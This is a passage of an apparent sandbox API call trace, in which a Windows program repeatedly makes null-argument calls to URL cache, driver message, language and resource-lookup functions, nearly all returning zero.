lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.667] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.668] GetUserDefaultLangID () returned 0x409 [0185.668] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.668] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.668] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.668] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.668] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.668] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.668] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.668] GetUserDefaultLangID () returned 0x409 [0185.668] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.668] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.668] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.668] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.668] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.668] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.668] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.668] GetUserDefaultLangID () returned 0x409 [0185.668] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.668] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.668] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.668] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.668] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.668] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.668] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.668] GetUserDefaultLangID () returned 0x409 [0185.668] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.668] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.668] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.668] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.668] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.668] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.668] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.668] GetUserDefaultLangID () returned 0x409 [0185.668] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.668] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.668] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.668] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.668] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.668] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.669] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.669] GetUserDefaultLangID () returned 0x409 [0185.669] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.669] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.669] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.669] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.669] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.669] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.669] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.669] GetUserDefaultLangID () returned 0x409 [0185.669] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.669] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.669] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.669] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.669] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.669] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.669] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.669] GetUserDefaultLangID () returned 0x409 [0185.669] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.669] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.669] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.669] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.669] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.669] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.669] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.669] GetUserDefaultLangID () returned 0x409 [0185.669] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.669] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.669] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.669] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.669] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.669] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.669] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.669] GetUserDefaultLangID () returned 0x409 [0185.669] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.669] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.669] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.669] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.669] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.669] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.670] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.670] GetUserDefaultLangID () returned 0x409 [0185.670] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.670] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.670] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.670] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.670] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.670] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.670] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.670] GetUserDefaultLangID () returned 0x409 [0185.670] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.670] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.670] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.670] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.670] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.670] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.670] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.670] GetUserDefaultLangID () returned 0x409 [0185.670] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.670] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.670] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.670] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.670] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.670] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.670] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.670] GetUserDefaultLangID () returned 0x409 [0185.670] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.670] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.670] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.670] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.670] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.670] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.670] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.670] GetUserDefaultLangID () returned 0x409 [0185.670] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.670] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.670] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.670] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.670] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.670] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.671] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.671] GetUserDefaultLangID () returned 0x409 [0185.671] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.671] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.671] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.671] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.671] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.671] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.671] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.671] GetUserDefaultLangID () returned 0x409 [0185.671] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.671] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.671] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.671] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.671] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.671] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.671] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.671] GetUserDefaultLangID () returned 0x409 [0185.671] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.671] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.671] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.671] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.671] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.671] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.671] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.671] GetUserDefaultLangID () returned 0x409 [0185.671] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.671] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.671] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.671] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.671] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.671] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.671] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.671] GetUserDefaultLangID () returned 0x409 [0185.671] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.671] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.671] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.671] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.671] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.671] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.672] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.672] GetUserDefaultLangID () returned 0x409 [0185.672] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.672] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.672] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.672] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.672] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.672] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.672] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.672] GetUserDefaultLangID () returned 0x409 [0185.672] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.672] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.672] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.672] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.672] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.672] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.672] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.672] GetUserDefaultLangID () returned 0x409 [0185.672] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.672] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.672] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.672] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.672] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.672] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.672] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.672] GetUserDefaultLangID () returned 0x409 [0185.672] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.672] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.672] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.672] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.672] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.672] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.672] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.672] GetUserDefaultLangID () returned 0x409 [0185.672] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.672] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.672] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.672] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.672] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.672] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.673] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.673] GetUserDefaultLangID () returned 0x409 [0185.673] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.673] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.673] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.673] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.673] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.673] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.673] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.673] GetUserDefaultLangID () returned 0x409 [0185.673] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.673] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.673] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.673] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.673] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.673] 